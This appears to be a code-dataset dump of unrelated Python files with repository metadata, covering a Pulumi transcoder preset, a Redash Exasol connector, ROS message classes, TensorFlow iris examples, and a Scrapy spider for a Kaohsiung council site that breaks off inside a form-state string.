class TestValidateCodeWithSimpleRegex(unittest.TestCase):
def test(self):
self.assertEqual(validate_code(123), True)
self.assertEqual(validate_code(248), True)
self.assertEqual(validate_code(8), False)
self.assertEqual(validate_code(321), True)
self.assertEqual(validate_code(9453), False)
def test_rand(self):
from random import randint
validate_sol=lambda code: str(code)[0] in "123"
for _ in range(40):
code=int(str(randint(1,6))+str(randint(1,10**randint(1,9))))
self.assertEqual(validate_code(code), validate_sol(code), "It should work for random inputs too")
if __name__ == '__main__':
unittest.main() | [
"darkdan099@gmail.com"
] | darkdan099@gmail.com |
d5854818d5e3e6c8e2cdd670b2817f56b180997d | 2a67dc681af4c4b9ef7a8e18c2ff75377dc5b44f | /aws.elastictranscoder.Preset-python/__main__.py | 65842b4d7b1e0d1857cb2f1f1a92513b38482b13 | [] | no_license | ehubbard/templates-aws | e323b693a18234defe6bd56ffcc64095dc58e3a1 | 2ae2e7a5d05490078017fed6d132dcdde1f21c63 | refs/heads/master | 2022-11-17T13:53:14.531872 | 2020-07-10T21:56:27 | 2020-07-10T21:56:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,452 | py | import pulumi
import pulumi_aws as aws
bar = aws.elastictranscoder.Preset("bar",
audio={
"audioPackingMode": "SingleTrack",
"bitRate": 96,
"channels": 2,
"codec": "AAC",
"sampleRate": 44100,
},
audio_codec_options={
"profile": "AAC-LC",
},
container="mp4",
description="Sample Preset",
thumbnails={
"format": "png",
"interval": 120,
"maxHeight": "auto",
"maxWidth": "auto",
"paddingPolicy": "Pad",
"sizingPolicy": "Fit",
},
video={
"bitRate": "1600",
"codec": "H.264",
"displayAspectRatio": "16:9",
"fixedGop": "false",
"frameRate": "auto",
"keyframesMaxDist": 240,
"maxFrameRate": "60",
"maxHeight": "auto",
"maxWidth": "auto",
"paddingPolicy": "Pad",
"sizingPolicy": "Fit",
},
video_codec_options={
"ColorSpaceConversionMode": "None",
"InterlacedMode": "Progressive",
"Level": "2.2",
"MaxReferenceFrames": 3,
"Profile": "main",
},
video_watermarks=[{
"horizontalAlign": "Right",
"horizontalOffset": "10px",
"id": "Test",
"maxHeight": "20%",
"maxWidth": "20%",
"opacity": "55.5",
"sizingPolicy": "ShrinkToFit",
"target": "Content",
"verticalAlign": "Bottom",
"verticalOffset": "10px",
}])
| [
"jvp@justinvp.com"
] | jvp@justinvp.com |
2e7a3c78dc70b3d8601a2cc34252103d8834c6d2 | 4da9c19d9839c670fda30a45a7e223da624eee4a | /Codechef Problem solutions/chef and happiness new.py | c2f55bca41451258e8ad08c4309a6725aa068313 | [] | no_license | JineshKamdar98/Codchef-Problem-Solutions | 3e1737669cc0657ccc224e06f800b587130f5787 | 4447679aa3fb45a2d57f93bf3f724f6223049506 | refs/heads/master | 2020-05-05T06:38:10.306619 | 2019-04-06T06:16:10 | 2019-04-06T06:16:10 | 179,795,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | for t in range(int(input())):
n=int(input())
a=list(map(int,input().split()[:n]))
a.sort()
index=[]
value=[]
f=0
for i in range(n-1,-1,-1):
if((a[i]-1) in index):
f=0
break
else:
index.append(a[i]-1)
value.append(a[i])
if(value.count(a[i])>1):
f=1
if(f==1):
print("Truly Happy")
else:
print("Poor Chef")
| [
"noreply@github.com"
] | JineshKamdar98.noreply@github.com |
29904bf7638508da99c3a12ea8f0679def218f3a | 4148260054c2cf4605dacb8bdef3605c82eca470 | /temboo/Library/Google/Picasa/AddCommentToPhoto.py | 8f14bfc24bb5d18a65fd905bcc1b74a6b9fa4d9f | [] | no_license | wimsy/actuarize-web | 0f23d5f00afe3d36d430621cdb497d2e64998416 | 5f43af3019da6fb08cafeec9ff0a89df5196b864 | refs/heads/master | 2021-03-12T19:38:21.887681 | 2012-12-19T01:13:50 | 2012-12-19T01:13:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,767 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# AddCommentToPhoto
# Adds a comment to a specified photo in Google Picasa.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
class AddCommentToPhoto(Choreography):
"""
Create a new instance of the AddCommentToPhoto Choreography. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
def __init__(self, temboo_session):
Choreography.__init__(self, temboo_session, '/Library/Google/Picasa/AddCommentToPhoto')
def new_input_set(self):
return AddCommentToPhotoInputSet()
def _make_result_set(self, result, path):
return AddCommentToPhotoResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return AddCommentToPhotoChoreographyExecution(session, exec_id, path)
"""
An InputSet with methods appropriate for specifying the inputs to the AddCommentToPhoto
choreography. The InputSet object is used to specify input parameters when executing this choreo.
"""
class AddCommentToPhotoInputSet(InputSet):
"""
Set the value of the AccessToken input for this choreography. ((optional, string) The access token retrieved in the last step of the Oauth process. Access tokens that are expired will be refreshed and returned in the Choreo output.)
"""
def set_AccessToken(self, value):
InputSet._set_input(self, 'AccessToken', value)
"""
Set the value of the AlbumID input for this choreography. ((required, integer) The id of the album which contains the photo you want to add a comment to.)
"""
def set_AlbumID(self, value):
InputSet._set_input(self, 'AlbumID', value)
"""
Set the value of the ClientID input for this choreography. ((required, string) The client id provided by Google.)
"""
def set_ClientID(self, value):
InputSet._set_input(self, 'ClientID', value)
"""
Set the value of the ClientSecret input for this choreography. ((required, string) The client secret provided by Google.)
"""
def set_ClientSecret(self, value):
InputSet._set_input(self, 'ClientSecret', value)
"""
Set the value of the Comment input for this choreography. ((required, string) The comment that you want to add to a photo.)
"""
def set_Comment(self, value):
InputSet._set_input(self, 'Comment', value)
"""
Set the value of the PhotoID input for this choreography. ((required, integer) The id of the photo you want to add a comment to.)
"""
def set_PhotoID(self, value):
InputSet._set_input(self, 'PhotoID', value)
"""
Set the value of the RefreshToken input for this choreography. ((required, string) The refresh token retrieved in the last step of the OAuth process. This is used when an access token is expired or not provided.)
"""
def set_RefreshToken(self, value):
InputSet._set_input(self, 'RefreshToken', value)
"""
Set the value of the UserID input for this choreography. ((optional, string) Google Picasa username. Defaults to 'default' which means the server will use the UserID of the user whose access token was specified.)
"""
def set_UserID(self, value):
InputSet._set_input(self, 'UserID', value)
"""
A ResultSet with methods tailored to the values returned by the AddCommentToPhoto choreography.
The ResultSet object is used to retrieve the results of a choreography execution.
"""
class AddCommentToPhotoResultSet(ResultSet):
"""
Retrieve the value for the "AccessToken" output from this choreography execution. ((optional, string) The access token retrieved in the last step of the Oauth process. Access tokens that are expired will be refreshed and returned in the Choreo output.)
"""
def get_AccessToken(self):
return self._output.get('AccessToken', None)
"""
Retrieve the value for the "Response" output from this choreography execution. ((xml) The response from Google Picasa.)
"""
def get_Response(self):
return self._output.get('Response', None)
class AddCommentToPhotoChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return AddCommentToPhotoResultSet(response, path)
| [
"mike.wimsatt@gmail.com"
] | mike.wimsatt@gmail.com |
2c683ab4db0dca1536a5101026e78e0f0ce3d233 | 707287238a36b8e5f3e26c347cca580549b441e5 | /combgen/linexts/pruesse_ruskey/coroutine/gen_all_no_sign.py | 9c51d769c4821cbf0a96ea4b8610985ba7f55d44 | [] | no_license | sahands/coroutine-generation | 2a01e3c5a36fc6b82d8087a15591a452e4bca636 | f0b318016b8925b2ab16640a588210548f7989db | refs/heads/master | 2016-09-06T04:54:02.453166 | 2015-01-06T21:32:58 | 2015-01-06T21:32:58 | 17,954,406 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | from .gen_all import gen_all
def gen_all_no_sign(n, poset, a_b_pairs):
for i, pi in enumerate(gen_all(n, poset, a_b_pairs)):
if i % 2 == 0:
yield pi[1:]
| [
"sahands@gmail.com"
] | sahands@gmail.com |
f742b40048d600de11e340648eb9e41f0de18b24 | adde5784379cba18934bc32bd779959ccc8bc94f | /redash/query_runner/exasol.py | 790fb7d7475c18e969c6cb22d50a6751c0be4eae | [
"BSD-2-Clause"
] | permissive | YuanlvCold/mxzz-bi | 32292a8cafb4097fcb60e70917849a2f23e5511f | 7cae1b80e2f715d0af7ca912d1793668353c4b9e | refs/heads/master | 2022-12-02T04:39:06.631341 | 2020-08-17T06:46:19 | 2020-08-17T06:46:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,668 | py | import datetime
from redash.query_runner import *
from redash.utils import json_dumps
def _exasol_type_mapper(val, data_type):
if val is None:
return None
elif data_type["type"] == "DECIMAL":
if data_type["scale"] == 0 and data_type["precision"] < 16:
return int(val)
elif data_type["scale"] == 0 and data_type["precision"] >= 16:
return val
else:
return float(val)
elif data_type["type"] == "DATE":
return datetime.date(int(val[0:4]), int(val[5:7]), int(val[8:10]))
elif data_type["type"] == "TIMESTAMP":
return datetime.datetime(
int(val[0:4]),
int(val[5:7]),
int(val[8:10]), # year, month, day
int(val[11:13]),
int(val[14:16]),
int(val[17:19]), # hour, minute, second
int(val[20:26].ljust(6, "0")) if len(val) > 20 else 0,
) # microseconds (if available)
else:
return val
def _type_mapper(data_type):
if data_type["type"] == "DECIMAL":
if data_type["scale"] == 0 and data_type["precision"] < 16:
return TYPE_INTEGER
elif data_type["scale"] == 0 and data_type["precision"] >= 16:
return TYPE_STRING
else:
return TYPE_FLOAT
elif data_type["type"] == "DATE":
return TYPE_DATE
elif data_type["type"] == "TIMESTAMP":
return TYPE_DATETIME
else:
return TYPE_STRING
try:
import pyexasol
enabled = True
except ImportError:
enabled = False
class Exasol(BaseQueryRunner):
noop_query = "SELECT 1 FROM DUAL"
@classmethod
def configuration_schema(cls):
return {
"type": "object",
"properties": {
"user": {"type": "string"},
"password": {"type": "string"},
"host": {"type": "string"},
"port": {"type": "number", "default": 8563},
"encrypted": {"type": "boolean", "title": "Enable SSL Encryption"},
},
"required": ["host", "port", "user", "password"],
"order": ["host", "port", "user", "password", "encrypted"],
"secret": ["password"],
}
def _get_connection(self):
exahost = "%s:%s" % (
self.configuration.get("host", None),
self.configuration.get("port", 8563),
)
return pyexasol.connect(
dsn=exahost,
user=self.configuration.get("user", None),
password=self.configuration.get("password", None),
encryption=self.configuration.get("encrypted", True),
compression=True,
json_lib="rapidjson",
fetch_mapper=_exasol_type_mapper,
)
def run_query(self, query, user):
connection = self._get_connection()
statement = None
error = None
try:
statement = connection.execute(query)
columns = [
{"name": n, "friendly_name": n, "type": _type_mapper(t)}
for (n, t) in statement.columns().items()
]
cnames = statement.column_names()
rows = [dict(zip(cnames, row)) for row in statement]
data = {"columns": columns, "rows": rows}
json_data = json_dumps(data)
finally:
if statement is not None:
statement.close()
connection.close()
return json_data, error
def get_schema(self, get_stats=False):
query = """
SELECT
COLUMN_SCHEMA,
COLUMN_TABLE,
COLUMN_NAME
FROM EXA_ALL_COLUMNS
"""
connection = self._get_connection()
statement = None
try:
statement = connection.execute(query)
result = {}
for (schema, table_name, column) in statement:
table_name_with_schema = "%s.%s" % (schema, table_name)
if table_name_with_schema not in result:
result[table_name_with_schema] = {
"name": table_name_with_schema,
"columns": [],
}
result[table_name_with_schema]["columns"].append(column)
finally:
if statement is not None:
statement.close()
connection.close()
return result.values()
@classmethod
def enabled(cls):
return enabled
register(Exasol)
| [
"2426548297@qq.com"
] | 2426548297@qq.com |
9f9ad3e97589ce06abe60f4f50a7a25348e188fb | 0f0a0d5672bf40438d68ad523f484da0760407e8 | /Intro to Tensorflow/regression.py | 09dcf16265433ca238162899742a45f9e63ad631 | [
"MIT"
] | permissive | ITSJKS/100-Days-of-ML-Code | 45b3c4873df7e8684308003b8cc860a08000e11b | 677d8d6a19ae63d3aa2ddd74e9ce8ae7a06b71df | refs/heads/master | 2023-04-14T06:22:04.196837 | 2019-01-21T07:58:59 | 2019-01-21T07:58:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Sep 22 19:01:05 2018
Tensorflow implementation of the iris dataset classification
@author: Vishal
"""
#Using a linear classifier
import tensorflow.contrib.learn as tf
from sklearn import datasets, metrics
iris = datasets.load_iris()
clf = tf.TensorFlowLinearClassifier(n_classes=3)
clf.fit(iris.data, iris.target)
acc = metrics.accuracy_score(iris.target, clf.predict(iris.data))
print(f'{acc}')
#Using a linear regressor
import tensorflow.contrib.learn as tf
from sklearn import datasets, metrics, preprocessing, cross_validation
iris = datasets.load_iris()
scaler = preprocessing.MinMaxScaler()
features = scaler.fit_transform(iris.data)
labels = iris.target
features_train, features_test, labels_train, labels_test = cross_validation.train_test_split(features, labels, test_size=0.3, random_state=42)
clf = tf.TensorFlowLinearRegressor()
clf.fit(features_train, labels_train)
accuracy = metrics.accuracy_score(labels_test, clf.predict(features_test))
print(f'{acc}') | [
"vishal114186@gmail.com"
] | vishal114186@gmail.com |
765b1ab039eeab0f545d9ebe0eaed5446fb91029 | a3acbac8cc1ab10ebd6459d5204459a31d5ca77a | /re_2dmap_extractor/src/re_2dmap_extractor/srv/_RequestLocMap.py | d92a36d12b3d2b31a2716dceebc8d47e870372b0 | [] | no_license | flavoi/roboearth | 970904486b385a9930ac853f13bbf8e82f48288d | 517a611c2531781dea7835c1cd2d80ff7e143638 | refs/heads/master | 2020-04-10T00:30:55.822173 | 2017-12-28T11:35:42 | 2017-12-28T11:35:42 | 6,952,511 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 14,206 | py | """autogenerated by genpy from re_2dmap_extractor/RequestLocMapRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import re_msgs.msg
class RequestLocMapRequest(genpy.Message):
_md5sum = "a31bdc686743a8e0baa91632efca1e98"
_type = "re_2dmap_extractor/RequestLocMapRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """re_msgs/RosFile octoMap
float64 z
string targetMapName
================================================================================
MSG: re_msgs/RosFile
# This file representation is used to pass binary data to the RoboEarthDB.
# As the endianess isn't stored, only files with a byte order mark (BOM) or
# an implicitly specified endianess should be transferred.
string name # file name
int8[] data # binary data
"""
__slots__ = ['octoMap','z','targetMapName']
_slot_types = ['re_msgs/RosFile','float64','string']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
octoMap,z,targetMapName
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(RequestLocMapRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.octoMap is None:
self.octoMap = re_msgs.msg.RosFile()
if self.z is None:
self.z = 0.
if self.targetMapName is None:
self.targetMapName = ''
else:
self.octoMap = re_msgs.msg.RosFile()
self.z = 0.
self.targetMapName = ''
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.octoMap.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.octoMap.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(struct.pack(pattern, *self.octoMap.data))
buff.write(_struct_d.pack(self.z))
_x = self.targetMapName
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.octoMap is None:
self.octoMap = re_msgs.msg.RosFile()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.octoMap.name = str[start:end].decode('utf-8')
else:
self.octoMap.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.octoMap.data = struct.unpack(pattern, str[start:end])
start = end
end += 8
(self.z,) = _struct_d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.targetMapName = str[start:end].decode('utf-8')
else:
self.targetMapName = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self.octoMap.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.octoMap.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(self.octoMap.data.tostring())
buff.write(_struct_d.pack(self.z))
_x = self.targetMapName
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.octoMap is None:
self.octoMap = re_msgs.msg.RosFile()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.octoMap.name = str[start:end].decode('utf-8')
else:
self.octoMap.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.octoMap.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)
start = end
end += 8
(self.z,) = _struct_d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.targetMapName = str[start:end].decode('utf-8')
else:
self.targetMapName = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_d = struct.Struct("<d")
"""autogenerated by genpy from re_2dmap_extractor/RequestLocMapResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import re_msgs.msg
class RequestLocMapResponse(genpy.Message):
_md5sum = "0cdfbb487eae2b1a99678f5623ad0e0e"
_type = "re_2dmap_extractor/RequestLocMapResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """bool success
re_msgs/RosFile locMap
re_msgs/RosFile locMeta
================================================================================
MSG: re_msgs/RosFile
# This file representation is used to pass binary data to the RoboEarthDB.
# As the endianess isn't stored, only files with a byte order mark (BOM) or
# an implicitly specified endianess should be transferred.
string name # file name
int8[] data # binary data
"""
__slots__ = ['success','locMap','locMeta']
_slot_types = ['bool','re_msgs/RosFile','re_msgs/RosFile']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
success,locMap,locMeta
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(RequestLocMapResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.success is None:
self.success = False
if self.locMap is None:
self.locMap = re_msgs.msg.RosFile()
if self.locMeta is None:
self.locMeta = re_msgs.msg.RosFile()
else:
self.success = False
self.locMap = re_msgs.msg.RosFile()
self.locMeta = re_msgs.msg.RosFile()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
buff.write(_struct_B.pack(self.success))
_x = self.locMap.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.locMap.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(struct.pack(pattern, *self.locMap.data))
_x = self.locMeta.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.locMeta.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(struct.pack(pattern, *self.locMeta.data))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.locMap is None:
self.locMap = re_msgs.msg.RosFile()
if self.locMeta is None:
self.locMeta = re_msgs.msg.RosFile()
end = 0
start = end
end += 1
(self.success,) = _struct_B.unpack(str[start:end])
self.success = bool(self.success)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.locMap.name = str[start:end].decode('utf-8')
else:
self.locMap.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.locMap.data = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.locMeta.name = str[start:end].decode('utf-8')
else:
self.locMeta.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.locMeta.data = struct.unpack(pattern, str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
buff.write(_struct_B.pack(self.success))
_x = self.locMap.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.locMap.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(self.locMap.data.tostring())
_x = self.locMeta.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.locMeta.data)
buff.write(_struct_I.pack(length))
pattern = '<%sb'%length
buff.write(self.locMeta.data.tostring())
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.locMap is None:
self.locMap = re_msgs.msg.RosFile()
if self.locMeta is None:
self.locMeta = re_msgs.msg.RosFile()
end = 0
start = end
end += 1
(self.success,) = _struct_B.unpack(str[start:end])
self.success = bool(self.success)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.locMap.name = str[start:end].decode('utf-8')
else:
self.locMap.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.locMap.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.locMeta.name = str[start:end].decode('utf-8')
else:
self.locMeta.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sb'%length
start = end
end += struct.calcsize(pattern)
self.locMeta.data = numpy.frombuffer(str[start:end], dtype=numpy.int8, count=length)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_B = struct.Struct("<B")
class RequestLocMap(object):
_type = 're_2dmap_extractor/RequestLocMap'
_md5sum = 'ff776d365b44637e4e3b054f6c62341b'
_request_class = RequestLocMapRequest
_response_class = RequestLocMapResponse
| [
"flavius476@gmail.com"
] | flavius476@gmail.com |
2e4709fffd71fb1f3063ee6d4fb22fb9316304a7 | 995a74ba81cafedfbc37358e3aa68027420fee08 | /crawler/kcc/kcc/spiders/councilors.py | aeec24518703e57889f4df657437621d22615fc3 | [
"CC0-1.0"
] | permissive | inno-v/councilor-voter-guide | 21c0cb64f6ba814c397e455e14028abc092f8cb3 | f394cfaaeb83852b1feeef91bff08cbe29b15bb2 | refs/heads/master | 2021-01-21T03:31:16.850558 | 2014-09-10T15:29:38 | 2014-09-10T15:29:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,128 | py | # -*- coding: utf-8 -*-
import re
import urllib
from urlparse import urljoin
import scrapy
from scrapy.http import Request, FormRequest
from scrapy.selector import Selector
from kcc.items import Councilor
def GetDate(text):
matchTerm = re.search(u'''
(?P<year>[\d]+)[\s]*(年|[.])[\s]*
(?P<month>[\d]+)[\s]*(月|[.])[\s]*
(?P<day>[\d]+)
''', text, re.X)
if matchTerm:
return '%04d-%02d-%02d' % (int(matchTerm.group('year'))+1911, int(matchTerm.group('month')), int(matchTerm.group('day')))
else:
return None
class Spider(scrapy.Spider):
name = "councilors_terms"
allowed_domains = ["www.kcc.gov.tw"]
start_urls = ["http://www.kcc.gov.tw/PeriodMembers/Search.aspx",]
download_delay = 0.5
def start_requests(self):
payload = {
'__EVENTTARGET':'ctl00$ContentPlaceHolder1$ddlPeriodTerms',
'__EVENTARGUMENT':'',
'__LASTFOCUS':'',
'__VIEWSTATE':u'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